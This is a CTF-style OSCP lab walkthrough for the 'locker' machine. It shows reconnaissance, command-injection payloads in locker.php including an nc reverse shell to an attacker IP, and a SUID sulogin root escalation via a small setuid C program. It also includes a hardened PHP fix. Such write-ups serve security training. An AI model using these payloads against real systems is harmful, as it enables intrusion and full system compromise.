OSCP Lab
Lab overview
locker | easy | information gathering, vulnerability discovery, command-execution bypass, SUID sulogin privilege escalation, gcc compilation
Information gathering
Host discovery
Port scan
┌──(root㉿kali)-[~]
└─# nmap -sV -A -p- -T4 192.168.1.140
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-20 20:37 EST
Nmap scan report for 192.168.1.140
Host is up (0.00062s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.14.2
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.14.2
MAC Address: 08:00:27:AE:BC:25 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.62 ms 192.168.1.140
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.63 seconds
Directory scan
┌──(root㉿kali)-[~]
└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.140 -x html,php,txt -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.140
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,php,txt
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.1.140/index.html (Status: 200) [Size: 142]
http://192.168.1.140/locker.php (Status: 200) [Size: 58]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
image=1, 2 and 3 all return pictures of padlocks.
Gaining access
Testing shows a command-execution vulnerability: wrapping extra commands in ; on either side of the parameter value gets them appended to the server-side command and executed.
curl http://192.168.1.140/locker.php?image=1;id;
http get http://192.168.1.140/locker.php?image=;pwd;
http://192.168.1.140/locker.php?image=1;nc+192.168.1.129+8989+-c+/bin/bash;
In the source code you can see that the supplied parameter is concatenated to form 1.jpg, the file is base64-encoded through a shell_exec() call, and the result is written out with print.
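A hardened rewrite of that locker.php pattern, added here as an example (not the lab's actual source): the image directory, function name and the exact original shell_exec line are assumptions reconstructed from the description above.

```php
<?php
// Added example: a hardened rewrite of the locker.php pattern described in the
// walkthrough. The image directory and function name are assumptions; this is
// not the lab's actual source.

// Pattern as described in the walkthrough (do NOT use): the query parameter is
// concatenated into a shell command line, so any shell metacharacters in
// ?image= are interpreted by /bin/sh.
//     print shell_exec("base64 " . $_GET['image'] . ".jpg");

// Hardened replacement: allowlist the parameter, pin the path, and do the
// base64 encoding in PHP so no process is ever spawned.
function lockerImageBase64(string $image, string $imageDir): ?string
{
    // The page only offers image=1, 2 and 3; reject everything else outright
    // (this also rejects ';', '/', '..' and any other non-digit input).
    if (!preg_match('/^[1-3]$/', $image)) {
        return null;
    }

    $baseDir = realpath($imageDir);
    $path    = realpath($imageDir . '/' . $image . '.jpg');

    // Defence in depth: even if the allowlist is loosened later, the resolved
    // file must still live inside the image directory.
    if ($baseDir === false || $path === false
        || strncmp($path, $baseDir . '/', strlen($baseDir) + 1) !== 0) {
        return null;
    }

    $data = file_get_contents($path);
    return $data === false ? null : base64_encode($data);
}

// __DIR__ . '/images' is an assumed location for the three padlock images.
$result = lockerImageBase64($_GET['image'] ?? '', __DIR__ . '/images');

if ($result === null) {
    http_response_code(400);
    echo 'invalid image';
} else {
    header('Content-Type: text/plain');
    echo $result;
}
```

With this version a request such as image=1;id; fails the allowlist and gets a 400, and there is no shell for the ; to reach in the first place.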
Privilege escalation
Enumerating SUID binaries shows that /usr/sbin/sulogin may be usable for escalation:
find / -perm -u=s -type f 2>/dev/null
sulogin man page: https://www.linux.org/docs/man8/sulogin.html
sulogin looks up the environment variable SUSHELL or sushell to determine which shell to start. If the variable is not set, it tries to execute root's shell from /etc/passwd. If that fails, it falls back to /bin/sh.
Next, we write a C program that sets the uid and gid to 0 and runs /bin/bash via system().
#include <stdio.h>
#include <stdlib.h>     /* system() */
#include <sys/types.h>
#include <unistd.h>     /* setgid(), setuid() */

/* Started by sulogin via SUSHELL: switch to uid/gid 0 and spawn bash. */
int main(void)
{
    setgid(0);
    setuid(0);
    system("/bin/bash");
    return 0;
}
gcc -o exp exp.c
After compiling, upload the binary to the target and set the environment variable:
chmod +x exp
export SUSHELL=/tmp/exp
echo $SUSHELL
(remote) www-data@locker:/tmp$ sulogin -e
Press Enter for maintenance
(or press Control-D to continue):
root@locker:~# whoami
root
root@locker:/home/tolocker# cat user.txt
flaglockeryes
root@locker:~# cat root.txt
igotroothere
End
Originally published on the WeChat public account 贝雷帽SEC: 【OSCP】locker